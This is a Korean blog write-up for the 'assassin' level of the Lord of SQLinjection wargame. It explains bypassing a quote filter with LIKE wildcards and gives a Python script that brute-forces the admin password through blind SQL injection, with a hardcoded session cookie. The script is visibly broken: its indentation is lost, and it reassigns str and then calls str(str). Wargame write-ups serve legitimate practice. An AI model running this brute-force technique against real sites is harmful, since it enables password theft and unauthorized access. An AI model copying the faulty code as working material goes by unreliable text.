728x90
문제 접근
1. '(싱글쿼터) 필터링
2. like 절 특성(sqli 와일드카드)
| % | 모든 문자 |
| _ | 한 글자 |
| A% | A로 시작하는 모든 문자 |
| %A | A로 끝나는 모든 문자 |
| %A% | A를 포함하는 모든 문자 |
3. admin pw 값 구하기
___e% 의미는 앞에 3글자가 있고 네 번째의 글자가 e인 경우
import requests
import string
string = string.ascii_lowercase + string.digits
url = 'https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php?'
cookie = {"PHPSESSID":"gcltff8itu5i5fc0lr3rel95vu"}
str = ''
for i in range(1,9):
for j in string:
params = 'pw='+str(str)+str(j)+'%'
response = requests.get(url, cookies=cookie, params=params)
if "Hello guest" in response.text:
str += '_'
break
elif "Hello admin" in response.text:
print(params)
break페이로드를 보면 첫번째 글자가 guest인지 admin인지 확인 후 guest인 경우 _ 으로 대체한 다음 두 번째 글자는 _(두 번째)% 구문이 입력이 된다.
'모의해킹 > Lord of SQLinjection' 카테고리의 다른 글
| zombie_assassin (0) | 2023.06.08 |
|---|---|
| succubus (0) | 2023.06.08 |
| giant (0) | 2023.06.05 |
| bugbear (0) | 2023.06.05 |
| darknight (0) | 2023.06.05 |
